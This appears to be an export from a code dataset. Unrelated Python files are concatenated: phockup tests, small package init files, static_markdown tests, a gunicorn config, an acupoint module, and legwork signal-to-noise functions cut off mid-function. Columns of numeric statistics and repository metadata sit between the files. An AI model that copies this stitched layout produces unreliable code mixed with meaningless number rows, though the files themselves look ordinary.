    """Ignored files such as .DS_Store are never copied to output."""
    shutil.rmtree('output', ignore_errors=True)
    shutil.rmtree('input_ignored', ignore_errors=True)
    os.mkdir('input_ignored')
    open("input_ignored/.DS_Store", "w").close()
    Phockup('input_ignored', 'output')
    assert not os.path.isfile("output/unknown/.DS_Store")
    shutil.rmtree('output', ignore_errors=True)
    shutil.rmtree('input_ignored', ignore_errors=True)
def test_keep_original_filenames(mocker):
    """original_filenames=True keeps the source base name (dated dir, no rename)."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output', original_filenames=True).process_file(
        "input/exif.jpg")
    assert os.path.isfile("output/2017/01/01/exif.jpg")
    assert not os.path.isfile("output/2017/01/01/20170101-010101.jpg")
    shutil.rmtree('output', ignore_errors=True)
def test_keep_original_filenames_and_filenames_case(mocker):
    """original_filenames=True also preserves the original letter case."""
    shutil.rmtree('output', ignore_errors=True)
    mocker.patch.object(Phockup, 'check_directories')
    mocker.patch.object(Phockup, 'walk_directory')
    Phockup('input', 'output', original_filenames=True).process_file(
        "input/UNKNOWN.jpg")
    assert os.path.isfile("output/2017/10/06/UNKNOWN.jpg")
    assert 'unknown.jpg' not in os.listdir("output/2017/10/06")
    shutil.rmtree('output', ignore_errors=True)
def test_maxdepth_zero():
    """maxdepth=0 limits recursion to the input root (note: unlike
    test_walking_directory, the nested 2018 tree is not asserted here)."""
    shutil.rmtree('output', ignore_errors=True)
    Phockup('input', 'output', maxdepth=0)
    dir1 = 'output/2017/01/01'
    dir2 = 'output/2017/10/06'
    dir3 = 'output/unknown'
    assert os.path.isdir(dir1)
    assert os.path.isdir(dir2)
    assert os.path.isdir(dir3)
    assert len([name for name in os.listdir(dir1) if
                os.path.isfile(os.path.join(dir1, name))]) == 3
    assert len([name for name in os.listdir(dir2) if
                os.path.isfile(os.path.join(dir2, name))]) == 1
    assert len([name for name in os.listdir(dir3) if
                os.path.isfile(os.path.join(dir3, name))]) == 1
    shutil.rmtree('output', ignore_errors=True)
def test_maxdepth_one():
    """maxdepth=1 also picks up files one directory level down (2018 tree appears)."""
    shutil.rmtree('output', ignore_errors=True)
    Phockup('input', 'output', maxdepth=1)
    dir1 = 'output/2017/01/01'
    dir2 = 'output/2017/10/06'
    dir3 = 'output/unknown'
    dir4 = 'output/2018/01/01/'
    assert os.path.isdir(dir1)
    assert os.path.isdir(dir2)
    assert os.path.isdir(dir3)
    assert os.path.isdir(dir4)
    assert len([name for name in os.listdir(dir1) if
                os.path.isfile(os.path.join(dir1, name))]) == 3
    assert len([name for name in os.listdir(dir2) if
                os.path.isfile(os.path.join(dir2, name))]) == 1
    assert len([name for name in os.listdir(dir3) if
                os.path.isfile(os.path.join(dir3, name))]) == 1
    assert len([name for name in os.listdir(dir4) if
                os.path.isfile(os.path.join(dir4, name))]) == 1
    shutil.rmtree('output', ignore_errors=True)
| 38.234828
| 79
| 0.702574
| 1,996
| 14,491
| 4.947896
| 0.087174
| 0.03949
| 0.079182
| 0.099635
| 0.851458
| 0.833131
| 0.806298
| 0.777744
| 0.772783
| 0.733799
| 0
| 0.067694
| 0.148782
| 14,491
| 378
| 80
| 38.335979
| 0.732955
| 0.003795
| 0
| 0.622581
| 0
| 0
| 0.24186
| 0.091174
| 0
| 0
| 0
| 0
| 0.209677
| 1
| 0.096774
| false
| 0
| 0.029032
| 0
| 0.125806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f711b0bb3f6d53da7f1abb4833845da364b2fe94
| 40
|
py
|
Python
|
rdkit/sping/Pyart/__init__.py
|
kazuyaujihara/rdkit
|
06027dcd05674787b61f27ba46ec0d42a6037540
|
[
"BSD-3-Clause"
] | 1,609
|
2015-01-05T02:41:13.000Z
|
2022-03-30T21:57:24.000Z
|
rdkit/sping/Pyart/__init__.py
|
kazuyaujihara/rdkit
|
06027dcd05674787b61f27ba46ec0d42a6037540
|
[
"BSD-3-Clause"
] | 3,412
|
2015-01-06T12:13:33.000Z
|
2022-03-31T17:25:41.000Z
|
rdkit/sping/Pyart/__init__.py
|
kazuyaujihara/rdkit
|
06027dcd05674787b61f27ba46ec0d42a6037540
|
[
"BSD-3-Clause"
] | 811
|
2015-01-11T03:33:48.000Z
|
2022-03-28T11:57:49.000Z
|
# sping:: pyart
from pidPyart import *
| 10
| 22
| 0.7
| 5
| 40
| 5.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 3
| 23
| 13.333333
| 0.875
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f74ecf6a233af7df8150ce1a4e7ffd0bcbd2bdf1
| 179
|
py
|
Python
|
kosmos/__init__.py
|
abostroem/kosmos
|
63758bb622a6ec83aeb3ac2350ccda5c6c1ef63b
|
[
"MIT"
] | 1
|
2022-02-24T21:50:06.000Z
|
2022-02-24T21:50:06.000Z
|
kosmos/__init__.py
|
abostroem/kosmos
|
63758bb622a6ec83aeb3ac2350ccda5c6c1ef63b
|
[
"MIT"
] | 2
|
2022-02-24T19:53:02.000Z
|
2022-02-24T20:13:26.000Z
|
kosmos/__init__.py
|
abostroem/kosmos
|
63758bb622a6ec83aeb3ac2350ccda5c6c1ef63b
|
[
"MIT"
] | 3
|
2022-01-26T18:27:42.000Z
|
2022-03-16T13:50:03.000Z
|
from .fluxcal import *
from .flatfield import *
from .apextract import *
from .identify import *
from .imtools import *
from .wrappers import *
from .version import __version__
| 22.375
| 32
| 0.759777
| 22
| 179
| 6
| 0.409091
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167598
| 179
| 7
| 33
| 25.571429
| 0.885906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f75b9b9647005c21e38a99bf926273af8a143343
| 814
|
py
|
Python
|
tests/test_cli.py
|
brunobord/static-markdown
|
7d9d7f3b76068087b3754cf15d2ae4d2dc2a5531
|
[
"MIT"
] | 5
|
2019-06-14T10:10:07.000Z
|
2021-12-20T17:46:53.000Z
|
tests/test_cli.py
|
brunobord/static-markdown
|
7d9d7f3b76068087b3754cf15d2ae4d2dc2a5531
|
[
"MIT"
] | 13
|
2019-06-13T21:00:58.000Z
|
2021-05-12T19:35:40.000Z
|
tests/test_cli.py
|
brunobord/static-markdown
|
7d9d7f3b76068087b3754cf15d2ae4d2dc2a5531
|
[
"MIT"
] | null | null | null |
from unittest.mock import MagicMock, patch
from static_markdown.server import main
def test_main_regular_call():
    """A plain invocation (no --version) must start the HTTP server."""
    args_patch = patch("argparse.ArgumentParser.parse_args")
    serve_patch = patch("http.server.HTTPServer.serve_forever")
    with args_patch as argument_mock, serve_patch as serve_mock:
        argument_mock.return_value = MagicMock(version=False, root=".", port=9999)
        serve_mock.return_value = True
        main()
        serve_mock.assert_called_once()
def test_main_with_version():
    """--version must short-circuit before the HTTP server is started."""
    args_patch = patch("argparse.ArgumentParser.parse_args")
    serve_patch = patch("http.server.HTTPServer.serve_forever")
    with args_patch as argument_mock, serve_patch as serve_mock:
        argument_mock.return_value = MagicMock(version=True, root=".", port=9999)
        serve_mock.return_value = True
        main()
        serve_mock.assert_not_called()
| 37
| 82
| 0.701474
| 102
| 814
| 5.313725
| 0.362745
| 0.099631
| 0.110701
| 0.114391
| 0.738007
| 0.738007
| 0.738007
| 0.738007
| 0.738007
| 0.738007
| 0
| 0.012346
| 0.203931
| 814
| 21
| 83
| 38.761905
| 0.824074
| 0
| 0
| 0.5
| 0
| 0
| 0.174447
| 0.17199
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.125
| true
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f7660b63ae4b4bf70baaf90c26ab90dff9955375
| 165
|
py
|
Python
|
app/api_v1/__init__.py
|
smolveau/TodoMessengerBot
|
a645152f00748d7c96cbef69ea593a7023b53dc7
|
[
"MIT"
] | null | null | null |
app/api_v1/__init__.py
|
smolveau/TodoMessengerBot
|
a645152f00748d7c96cbef69ea593a7023b53dc7
|
[
"MIT"
] | null | null | null |
app/api_v1/__init__.py
|
smolveau/TodoMessengerBot
|
a645152f00748d7c96cbef69ea593a7023b53dc7
|
[
"MIT"
] | 1
|
2018-08-03T15:27:07.000Z
|
2018-08-03T15:27:07.000Z
|
from flask import Blueprint
# Blueprint grouping the v1 API endpoints; presumably registered on the app
# elsewhere (registration site not visible here) — TODO confirm.
api = Blueprint('api_v1', __name__)
# Import any endpoints here to make them available
from . import webhook
from . import webhook_dev
| 20.625
| 50
| 0.781818
| 24
| 165
| 5.125
| 0.666667
| 0.195122
| 0.276423
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.163636
| 165
| 7
| 51
| 23.571429
| 0.884058
| 0.290909
| 0
| 0
| 0
| 0
| 0.052174
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
e3aaa40a36af4a7df0cb9dd65a597d6464c9afa7
| 43
|
py
|
Python
|
mlrun/utils/version/__init__.py
|
Hedingber/mlrun
|
e2269718fcc7caa7e1aa379ac28495830b45f9da
|
[
"Apache-2.0"
] | 1
|
2021-02-17T08:12:33.000Z
|
2021-02-17T08:12:33.000Z
|
mlrun/utils/version/__init__.py
|
Hedingber/mlrun
|
e2269718fcc7caa7e1aa379ac28495830b45f9da
|
[
"Apache-2.0"
] | 1
|
2020-12-31T14:36:29.000Z
|
2020-12-31T14:36:29.000Z
|
mlrun/utils/version/__init__.py
|
Hedingber/mlrun
|
e2269718fcc7caa7e1aa379ac28495830b45f9da
|
[
"Apache-2.0"
] | 1
|
2021-08-30T21:43:38.000Z
|
2021-08-30T21:43:38.000Z
|
from .version import Version # noqa: F401
| 21.5
| 42
| 0.744186
| 6
| 43
| 5.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 0.186047
| 43
| 1
| 43
| 43
| 0.828571
| 0.232558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e3d7acb78adc1b388116a6b4641fd335ad007b36
| 147
|
py
|
Python
|
gunicorn_config.py
|
mikaponics/mikaponics-back
|
98e1ff8bab7dda3492e5ff637bf5aafd111c840c
|
[
"BSD-3-Clause"
] | 2
|
2019-04-30T23:51:41.000Z
|
2019-05-04T00:35:52.000Z
|
gunicorn_config.py
|
mikaponics/mikaponics-back
|
98e1ff8bab7dda3492e5ff637bf5aafd111c840c
|
[
"BSD-3-Clause"
] | 27
|
2019-04-30T20:22:28.000Z
|
2022-02-10T08:10:32.000Z
|
gunicorn_config.py
|
mikaponics/mikaponics-back
|
98e1ff8bab7dda3492e5ff637bf5aafd111c840c
|
[
"BSD-3-Clause"
] | null | null | null |
# Gunicorn deployment settings (loaded via `gunicorn -c gunicorn_config.py`).

# Absolute path to the gunicorn binary inside the project's virtualenv.
command = '/opt/django/mikaponics-back/env/bin/gunicorn'
# Directory added to sys.path so the Django project package can be imported.
pythonpath = '/opt/django/mikaponics-back/mikaponics'
# Bind to localhost only — presumably a reverse proxy sits in front; confirm.
bind = '127.0.0.1:8001'
# Number of worker processes.
workers = 3
| 29.4
| 56
| 0.741497
| 22
| 147
| 4.954545
| 0.727273
| 0.165138
| 0.348624
| 0.422018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081481
| 0.081633
| 147
| 4
| 57
| 36.75
| 0.725926
| 0
| 0
| 0
| 0
| 0
| 0.653061
| 0.557823
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
540729192759137cb0afd42990831676554373fd
| 657
|
py
|
Python
|
meridian/channels/lung.py
|
sinotradition/meridian
|
8c6c1762b204b72346be4bbfb74dedd792ae3024
|
[
"Apache-2.0"
] | 5
|
2015-12-14T15:14:23.000Z
|
2022-02-09T10:15:33.000Z
|
meridian/channels/lung.py
|
sinotradition/meridian
|
8c6c1762b204b72346be4bbfb74dedd792ae3024
|
[
"Apache-2.0"
] | null | null | null |
meridian/channels/lung.py
|
sinotradition/meridian
|
8c6c1762b204b72346be4bbfb74dedd792ae3024
|
[
"Apache-2.0"
] | 3
|
2015-11-27T05:23:49.000Z
|
2020-11-28T09:01:56.000Z
|
#!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
from meridian.acupoints import zhongfu13
from meridian.acupoints import yunmen22
from meridian.acupoints import tianfu13
from meridian.acupoints import xiabai22
from meridian.acupoints import chize32
from meridian.acupoints import kongzui34
from meridian.acupoints import lieque41
from meridian.acupoints import jingqu12
from meridian.acupoints import taiyuan41
from meridian.acupoints import yuji24
from meridian.acupoints import shaoshang31
# Pinyin (tone-marked) romanization of the channel name.
SPELL=u'shǒutàiyīnfèijīng'
# Chinese name of the channel ("Lung Channel of Hand-Taiyin").
CN=u'手太阴肺经'
# Two-letter abbreviation for the lung channel.
ABBR=u'LU'
NAME='lung'
FULLNAME='LungChannelofHand-Taiyin'
# Ordinal of this channel — presumably first of the twelve meridians; confirm.
SEQ=1
if __name__ == '__main__':
    pass
| 19.323529
| 42
| 0.808219
| 84
| 657
| 6.22619
| 0.488095
| 0.25239
| 0.441683
| 0.567878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041237
| 0.114155
| 657
| 33
| 43
| 19.909091
| 0.857388
| 0.082192
| 0
| 0
| 0
| 0
| 0.10101
| 0.040404
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.052632
| 0.578947
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
580af26b740a7304c8b21122e96ccdb142f1d603
| 15,766
|
py
|
Python
|
legwork/snr.py
|
katiebreivik/LEGWORK
|
07c3938697ca622fc39d9617d74f28262ac2b1aa
|
[
"MIT"
] | 12
|
2021-02-22T23:24:42.000Z
|
2021-08-05T21:47:55.000Z
|
legwork/snr.py
|
katiebreivik/LEGWORK
|
07c3938697ca622fc39d9617d74f28262ac2b1aa
|
[
"MIT"
] | 24
|
2021-02-12T22:41:08.000Z
|
2021-09-23T21:13:16.000Z
|
legwork/snr.py
|
katiebreivik/LEGWORK
|
07c3938697ca622fc39d9617d74f28262ac2b1aa
|
[
"MIT"
] | null | null | null |
"""Functions to calculate signal-to-noise ratio in four different cases"""
import numpy as np
from legwork import strain, psd, utils, evol
import astropy.units as u
# Public API: the four SNR entry points (circular/eccentric × stationary/evolving).
__all__ = ['snr_circ_stationary', 'snr_ecc_stationary',
           'snr_circ_evolving', 'snr_ecc_evolving']
def snr_circ_stationary(m_c, f_orb, dist, t_obs, position=None, polarisation=None, inclination=None,
                        interpolated_g=None, interpolated_sc=None, instrument="LISA", custom_psd=None):
    """Computes SNR for circular and stationary sources
    Parameters
    ----------
    m_c : `float/array`
        Chirp mass
    f_orb : `float/array`
        Orbital frequency
    dist : `float/array`
        Distance to the source
    t_obs : `float`
        Total duration of the observation
    position : `SkyCoord/array`, optional
        Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
    polarisation : `float/array`, optional
        GW polarisation of the source. Must have astropy angular units.
    inclination : `float/array`, optional
        Inclination of the source. Must have astropy angular units.
    interpolated_g : `function`
        A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
        The code assumes that the function returns the output sorted as with the interp2d returned functions
        (and thus unsorts). Default is None and uses exact g(n,e) in this case.
    interpolated_sc : `function`
        A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
        Default is None and uses exact values. Note: take care to ensure that your interpolated function has
        the same LISA observation time as ``t_obs`` and uses the same instrument.
    instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
        Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
    custom_psd : `function`
        Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
        even if it ignores some.
    Returns
    -------
    snr : `float/array`
        SNR for each binary
    """
    # only need to compute n=2 harmonic for circular
    h_0_circ_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=np.zeros_like(f_orb).value, n=2, dist=dist,
                              position=position, polarisation=polarisation, inclination=inclination,
                              interpolated_g=interpolated_g).flatten()**2
    # squared strain accumulated over the observation time
    h_f_src_circ_2 = h_0_circ_2 * t_obs
    # use the pre-interpolated sensitivity curve when given, otherwise evaluate the PSD exactly;
    # the GW frequency of the n=2 harmonic is twice the orbital frequency
    if interpolated_sc is not None:
        h_f_lisa_2 = interpolated_sc(2 * f_orb)
    else:
        h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb, t_obs=t_obs, instrument=instrument,
                                                custom_psd=custom_psd)
    # SNR^2 = source power / noise power at the n=2 harmonic
    snr = (h_f_src_circ_2 / h_f_lisa_2)**0.5
    # decompose() reduces the astropy Quantity to base units (SNR is dimensionless)
    return snr.decompose()
def snr_ecc_stationary(m_c, f_orb, ecc, dist, t_obs, harmonics_required,
                       position=None, polarisation=None, inclination=None,
                       interpolated_g=None, interpolated_sc=None,
                       ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
                       instrument="LISA", custom_psd=None):
    """Computes SNR for eccentric and stationary sources
    Parameters
    ----------
    m_c : `float/array`
        Chirp mass
    f_orb : `float/array`
        Orbital frequency
    ecc : `float/array`
        Eccentricity
    dist : `float/array`
        Distance to the source
    t_obs : `float`
        Total duration of the observation
    harmonics_required : `integer`
        Maximum integer harmonic to compute
    position : `SkyCoord/array`, optional
        Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
    polarisation : `float/array`, optional
        GW polarisation of the source. Must have astropy angular units.
    inclination : `float/array`, optional
        Inclination of the source. Must have astropy angular units.
    interpolated_g : `function`
        A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
        The code assumes that the function returns the output sorted as with the interp2d returned functions
        (and thus unsorts). Default is None and uses exact g(n,e) in this case.
    interpolated_sc : `function`
        A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
        Default is None and uses exact values. Note: take care to ensure that your interpolated function has
        the same LISA observation time as ``t_obs`` and uses the same instrument.
    ret_max_snr_harmonic : `boolean`
        Whether to return (in addition to the snr), the harmonic with the maximum SNR
    ret_snr2_by_harmonic : `boolean`
        Whether to return the SNR^2 in each individual harmonic rather than the total.
        The total can be retrieving by summing and then taking the square root.
    instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
        Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
    custom_psd : `function`
        Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
        even if it ignores some.
    Returns
    -------
    snr : `float/array`
        SNR for each binary
    max_snr_harmonic : `int/array`
        harmonic with maximum SNR for each binary (only returned if ``ret_max_snr_harmonic=True``)
    """
    # define range of harmonics
    n_range = np.arange(1, harmonics_required + 1).astype(int)
    # calculate source signal
    h_0_ecc_n_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=ecc, n=n_range, dist=dist,
                               position=position, polarisation=polarisation,
                               inclination=inclination, interpolated_g=interpolated_g)**2
    # reshape the output since only one timestep
    h_0_ecc_n_2 = h_0_ecc_n_2.reshape(len(m_c), harmonics_required)
    h_f_src_ecc_2 = h_0_ecc_n_2 * t_obs
    # calculate harmonic frequencies and noise
    # (outer product: shape (n_binaries, harmonics_required))
    f_n = n_range[np.newaxis, :] * f_orb[:, np.newaxis]
    if interpolated_sc is not None:
        # the interpolator takes a 1-D array, so flatten then restore the 2-D shape
        h_f_lisa_n_2 = interpolated_sc(f_n.flatten())
        h_f_lisa_n_2 = h_f_lisa_n_2.reshape(f_n.shape)
    else:
        h_f_lisa_n_2 = psd.power_spectral_density(f=f_n, t_obs=t_obs,
                                                  instrument=instrument, custom_psd=custom_psd)
    # per-harmonic SNR^2, reduced to base (dimensionless) units
    snr_n_2 = (h_f_src_ecc_2 / h_f_lisa_n_2).decompose()
    if ret_snr2_by_harmonic:
        return snr_n_2
    # calculate the signal-to-noise ratio
    snr = (np.sum(snr_n_2, axis=1))**0.5
    if ret_max_snr_harmonic:
        # +1 converts the 0-based argmax index into the harmonic number n (n_range starts at 1)
        max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
        return snr, max_snr_harmonic
    else:
        return snr
def snr_circ_evolving(m_1, m_2, f_orb_i, dist, t_obs, n_step,
                      position=None, polarisation=None, inclination=None, t_merge=None,
                      interpolated_g=None, interpolated_sc=None,
                      instrument="LISA", custom_psd=None):
    """Computes SNR for circular and evolving sources

    The orbital frequency is evolved over the observation (or until just
    before merger, whichever is shorter) and the SNR is obtained by
    integrating the n=2 harmonic's characteristic strain over that
    frequency evolution.

    Parameters
    ----------
    m_1 : `float/array`
        Primary mass
    m_2 : `float/array`
        Secondary mass
    f_orb_i : `float/array`
        Initial orbital frequency
    dist : `float/array`
        Distance to the source
    t_obs : `float`
        Total duration of the observation
    n_step : `int`
        Number of time steps during observation duration
    position : `SkyCoord/array`, optional
        Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
        NOTE(review): accepted but not forwarded to ``strain.h_c_n`` below — confirm intended.
    polarisation : `float/array`, optional
        GW polarisation of the source. Must have astropy angular units.
        NOTE(review): accepted but not forwarded to ``strain.h_c_n`` below — confirm intended.
    inclination : `float/array`, optional
        Inclination of the source. Must have astropy angular units.
        NOTE(review): accepted but not forwarded to ``strain.h_c_n`` below — confirm intended.
    t_merge : `float/array`
        Time until merger. Computed from the initial conditions if None.
    interpolated_g : `function`
        A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
        Default is None and uses exact g(n,e) in this case.
    interpolated_sc : `function`
        A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
        Default is None and uses exact values. Note: take care to ensure that your interpolated function has
        the same LISA observation time as ``t_obs`` and uses the same instrument.
    instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
        Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
    custom_psd : `function`
        Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
        even if it ignores some.

    Returns
    -------
    sn : `float/array`
        SNR for each binary
    """
    m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
    # calculate minimum of observation time and merger time
    # (1 second is subtracted so that we never evolve exactly to merger)
    if t_merge is None:
        t_merge = evol.get_t_merge_circ(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
    t_evol = np.minimum(t_merge - (1 * u.s), t_obs)
    # get f_orb evolution
    f_orb_evol = evol.evol_circ(t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
    # replace the 1e2 Hz entries (presumably a post-merger sentinel from
    # evol_circ — TODO confirm) with each source's largest non-sentinel frequency
    maxes = np.where(f_orb_evol == 1e2 * u.Hz, -1 * u.Hz, f_orb_evol).max(axis=1)
    for source in range(len(f_orb_evol)):
        f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
    # calculate the characteristic power (squared characteristic strain, n=2 only)
    h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=np.zeros_like(f_orb_evol).value, n=2, dist=dist,
                           interpolated_g=interpolated_g)**2
    h_c_n_2 = h_c_n_2.reshape(len(m_c), n_step)
    # calculate the characteristic noise power at the GW frequency (2 * f_orb)
    if interpolated_sc is not None:
        h_f_lisa_2 = interpolated_sc(2 * f_orb_evol.flatten())
        h_f_lisa_2 = h_f_lisa_2.reshape(f_orb_evol.shape)
    else:
        h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb_evol, t_obs=t_obs,
                                                instrument=instrument, custom_psd=custom_psd)
    h_c_lisa_2 = (2 * f_orb_evol)**2 * h_f_lisa_2
    # integrate signal-to-noise over the frequency evolution and take the square root
    snr = np.trapz(y=h_c_n_2 / h_c_lisa_2, x=2 * f_orb_evol, axis=1)**0.5
    return snr.decompose()
def snr_ecc_evolving(m_1, m_2, f_orb_i, dist, ecc, harmonics_required, t_obs, n_step,
                     position=None, polarisation=None, inclination=None, t_merge=None,
                     interpolated_g=None, interpolated_sc=None, n_proc=1,
                     ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
                     instrument="LISA", custom_psd=None):
    """Computes SNR for eccentric and evolving sources.

    Note that this function will not work for exactly circular (ecc = 0.0)
    binaries.

    Parameters
    ----------
    m_1 : `float/array`
        Primary mass
    m_2 : `float/array`
        Secondary mass
    f_orb_i : `float/array`
        Initial orbital frequency
    dist : `float/array`
        Distance to the source
    ecc : `float/array`
        Eccentricity
    harmonics_required : `int`
        Maximum integer harmonic to compute
    t_obs : `float`
        Total duration of the observation
    n_step : `int`
        Number of time steps during observation duration
    position : `SkyCoord/array`, optional
        Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
    polarisation : `float/array`, optional
        GW polarisation of the source. Must have astropy angular units.
    inclination : `float/array`, optional
        Inclination of the source. Must have astropy angular units.
    t_merge : `float/array`
        Time until merger. Computed from the initial conditions if None.
    interpolated_g : `function`
        A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
        Default is None and uses exact g(n,e) in this case.
    interpolated_sc : `function`
        A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
        Default is None and uses exact values. Note: take care to ensure that your interpolated function has
        the same LISA observation time as ``t_obs`` and uses the same instrument.
    n_proc : `int`
        Number of processors to split eccentricity evolution over (default 1)
    ret_max_snr_harmonic : `boolean`
        Whether to return (in addition to the snr), the harmonic with the maximum SNR
    ret_snr2_by_harmonic : `boolean`
        Whether to return the SNR^2 in each individual harmonic rather than the total.
        The total can be retrieved by summing and then taking the square root.
    instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
        Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
    custom_psd : `function`
        Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
        even if it ignores some.

    Returns
    -------
    snr : `float/array`
        SNR for each binary
    max_snr_harmonic : `int/array`
        harmonic with maximum SNR for each binary (only returned if ``ret_max_snr_harmonic=True``)
    """
    m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
    # if no merger time was supplied, work it out from the initial conditions
    if t_merge is None:
        t_merge = evol.get_t_merge_ecc(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i, ecc_i=ecc)
    # evolve up to the shorter of the observation and (just short of) the merger
    t_before = 0.1 * u.yr
    t_evol = np.minimum(t_merge - t_before, t_obs).to(u.s)
    # get eccentricity and orbital frequency evolutions
    e_evol, f_orb_evol = evol.evol_ecc(ecc_i=ecc, t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2,
                                       f_orb_i=f_orb_i, n_proc=n_proc, t_before=t_before, t_merge=t_merge)
